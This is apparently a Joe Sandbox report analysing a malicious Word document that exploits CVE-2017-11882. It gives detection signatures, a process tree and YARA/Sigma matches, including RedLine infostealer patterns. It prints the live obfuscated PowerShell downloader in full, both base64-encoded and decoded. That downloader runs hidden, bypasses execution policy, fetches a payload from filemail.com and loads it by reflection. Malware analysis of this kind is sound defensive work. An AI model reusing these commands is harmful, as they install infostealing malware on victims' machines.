Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ConfirmaciXnXdeXfacturaXPedidoXadicional.doc

Overview

General Information

Sample name:ConfirmaciXnXdeXfacturaXPedidoXadicional.doc
Analysis ID:1551308
MD5:3585873ff559b339ce1ed181cf2c26c0
SHA1:1189fc8c7e1fc8db4d89bbea5b72f7464c499119
SHA256:072d452d181adbca486c143de3c41500bdccd335ec909af452360babdd040b92
Tags:CVE-2017-11882docuser-lowmal3
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential malicious VBS script found (has network functionality)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3520 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3600 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3764 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gdfgcvbi.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • wscript.exe (PID: 3820 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\gDHxsqtDodRnltJFOd.js" MD5: 979D74799EA6C8B8167869A68DF5204A)
          • powershell.exe (PID: 3916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAJwArACcAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAJwArACcAbwBhAGQAKABLACcAKwAnADYAcABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsASwA2AHAAdgBhAGkATQBlAHQAaABvAGQAIAA9ACAAWwBkAG4AJwArACcAbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNACcAKwAnAGUAdABoAG8AZAAoAHMAUwBYAFYAQQBJAHMAUwBYACkAOwBLADYAcAB2AGEAaQBNAGUAdABoAG8AZAAuAEkAbgAnACsAJwB2AG8AawAnACsAJwBlACgASwA2AHAAbgB1AGwAJwArACcAbAAsACAAQAAoAHMAUwBYAHQAeAB0AC4ATABTAFMAVwBTAC8AawBsAG8ALwB1AGUALgBoAHMAdQBwAHcAcwByAGUAbABsAG8AcgAuAHMAdQBwAC8ALwA6AHAAdAB0AGgAcwBTAFgALAAgAHMAUwBYAGQAZQBzAGEAdABpAHYAYQBkAG8AcwBTAFgALAAgAHMAUwBYAGQAZQBzAGEAdABpAHYAYQBkAG8AcwBTAFgALAAgAHMAUwBYAGQAZQBzAGEAdAAnACsAJwBpAHYAYQBkAG8AcwBTAFgALAAgAHMAUwBYAGQAZQBzAGEAdABpAHYAJwArACcAYQBkAG8AcwBTAFgALAAgAHMAUwBYADEAcwBTAFgALAAgAHMAUwBYAE8AbgBlAEQAcgBpAHYAZQBTAGUAdAB1AHAAcwBTAFgALABzAFMAWABkAGUAcwBhAHQAaQB2AGEAZABvAHMAUwBYACwAIABzAFMAWABkAGUAcwBhAHQAaQB2AGEAZABvAHMAUwBYACwAcwBTAFgAZABlAHMAYQB0AGkAdgBhAGQAbwBzAFMAWAAnACsAJwAsAHMAUwBYAGQAJwArACcAZQBzAGEAdABpAHYAYQBkAG8AcwBTAFgALABzAFMAWABkAGUAcwBhAHQAaQB2AGEAZABvAHMAUwBYACwAcwBTAFgAMQBzAFMAWAAsAHMAUwBYAGQAZQBzACcAKwAnAGEAdABpAHYAYQBkAG8AcwBTAFgAKQApADsAJwApAC4AcgBFAFAATABBAGMAZQAoACcASwA2AHAAJwAsAFsAUwB0AHIASQBOAEcAXQBbAEMAaABhAFIAXQAzADYAKQAuAHIARQBQAEwAQQBjAGUAKAAnAGgATgBMACcALAAnAHwAJwApAC4AcgBFAFAATABBAGMAZQAoACgAWwBDAGgAYQBSAF0AMQAxADUAKwBbAEMAaABhAFIAXQA4ADMAKwBbAEMAaABhAFIAXQA4ADgAKQAsAFsAUwB0AHIASQBOAEcAXQBbAEMAaABhAFIAXQAzADkAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • powershell.exe (PID: 4004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • EQNEDT32.EXE (PID: 3200 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
ConfirmaciXnXdeXfacturaXPedidoXadicional.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2105:$obj2: \objdata
  • 0x211a:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3916INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x712f9:$b2: ::FromBase64String(
  • 0xcbb74:$b2: ::FromBase64String(
  • 0xcc6ba:$b2: ::FromBase64String(
  • 0xcd84c:$b2: ::FromBase64String(
  • 0xcdfc4:$b2: ::FromBase64String(
  • 0xce8a7:$b2: ::FromBase64String(
  • 0xcef78:$b2: ::FromBase64String(
  • 0x710a9:$b3: ::UTF8.GetString(
  • 0xcb91c:$b3: ::UTF8.GetString(
  • 0xcc462:$b3: ::UTF8.GetString(
  • 0xcd5f4:$b3: ::UTF8.GetString(
  • 0xcdd6c:$b3: ::UTF8.GetString(
  • 0xce64f:$b3: ::UTF8.GetString(
  • 0xced20:$b3: ::UTF8.GetString(
  • 0x70f39:$s1: -joIn
  • 0x71268:$s1: -join
  • 0x8116d:$s1: -joIn
  • 0xcb7ac:$s1: -joIn
  • 0xcbae3:$s1: -join
  • 0xcc2f2:$s1: -joIn
  • 0xcc629:$s1: -join
Process Memory Space: powershell.exe PID: 4004JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 4004INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x2ee1f:$b2: ::FromBase64String(
    • 0xc22f7:$b2: ::FromBase64String(
    • 0xc29bd:$b2: ::FromBase64String(
    • 0xc3f0b:$b2: ::FromBase64String(
    • 0x12bc1b:$b2: ::FromBase64String(
    • 0x12ca7d:$b2: ::FromBase64String(
    • 0x12d875:$b2: ::FromBase64String(
    • 0x12df3b:$b2: ::FromBase64String(
    • 0x17350e:$b2: ::FromBase64String(
    • 0x1744b8:$b2: ::FromBase64String(
    • 0x17638f:$b2: ::FromBase64String(
    • 0x1b090f:$b2: ::FromBase64String(
    • 0x3b9b27:$b2: ::FromBase64String(
    • 0x3ba1ec:$b2: ::FromBase64String(
    • 0x3e00e8:$b2: ::FromBase64String(
    • 0x3e0872:$b2: ::FromBase64String(
    • 0x3ea654:$b2: ::FromBase64String(
    • 0x3eb8b5:$b2: ::FromBase64String(
    • 0x2ebc7:$b3: ::UTF8.GetString(
    • 0xc209f:$b3: ::UTF8.GetString(
    • 0xc2765:$b3: ::UTF8.GetString(
    SourceRuleDescriptionAuthorStrings
    9.2.powershell.exe.65e6590.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      9.2.powershell.exe.380f018.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 73 88 44 24 2B 88 44 24 2F B0 F6 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.

      Exploits

      barindex
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 141.98.10.88, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3600, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3600, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jukhccby[1].vbs

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAoAFsAUwB0AHIAaQBuAEcAXQAkAHYARQBSAEIAbwBTAGUAUAByAGUARgBFAHIAZQBOAGMAZQApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkAbgAnACcAKQAoACgAJwBLADYAcABpAG0AYQBnAGUAVQByAGwAJwArACcAIAA9ACAAcwAnACsAJwBTAFgAaAB0AHQAcABzADoALwAnACsAJwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAnACsAJwAvAGEAcABpACcAKwAnAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQAnACsAJwA9ADIAJwArACcAQQBhACcAKwAnAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5ACcAKwAnAHAAVAA5AHAAJwArACcAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAJwArACcAQwBmAEYAaABtAFQASwBqACcAKwAnADMATABDADYAUwBRAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2AGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHMAUwBYADsASwA2AHAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDACcAKwAnAGwAaQBlAG4AdAA7AEsANgBwAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAASwA2AHAAdwBlACcAKwAnAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhACcAKwAnAGQARABhAHQAYQAoAEsANgBwAGkAbQBhAGcAZQBVAHIAbAApADsASwA2AHAAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASwA2AHAAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsASwA2AHAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcwBTAFgAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBzAFMAWAA7AEsANgBwAGUAbgBkAEYAbABhAGcAIAA9ACAAcwAnACsAJwBTAFgAPAA8AEIAQQBTAEUANgA0AF8ARQAnACsAJwBOAEQAPgA+AHMAUwBYADsASwA2AHAAcwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABLADYAcABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABLADYAcABzAHQAYQByAHQARgBsAGEAZwApADsASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEsANgBwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEsANgBwAGUAbgBkAEYAbABhAGcAKQA7AEsAJwArACcANgBwAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAASwA2AHAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAJwArACcAIABLADYAcABzAHQAYQByAHQASQBuAGQAZQB4ADsASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEsANgBwAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBLADYAcABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABLADYAcABlAG4AZABJAG4AZABlAHgAIAAtACAASwA2AHAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEsANgBwAGIAYQBzAGUANgAnACsAJwA0AEMAbwBtAG0AYQBuAGQAIAA9ACAASwA2AHAAaQBtAGEAZwBlACcAKwAnAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEsANgBwAHMAdABhAHIAdABJAG4AZABlAHgALAAgAEsANgBwAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBLADYAcABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABLADYAcABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAJwArACcAYQB5ACgAKQAgACcAKwAnAGgATgBMACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEsANgBwAF8AIAB9ACkAWwAtADEAJwArACcALgAuAC0AKABLADYAcABiAGEAcwBlADYANABDAG8AbQAnACsAJwBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASwA2AHAAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEsANgBwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgAnACsAJwBzAGUAZAApADsASwA2AHAAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAJwArACcAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAb
      Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3600, Protocol: tcp, SourceIp: 141.98.10.88, SourceIsIpv6: false, SourcePort: 80
      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]:
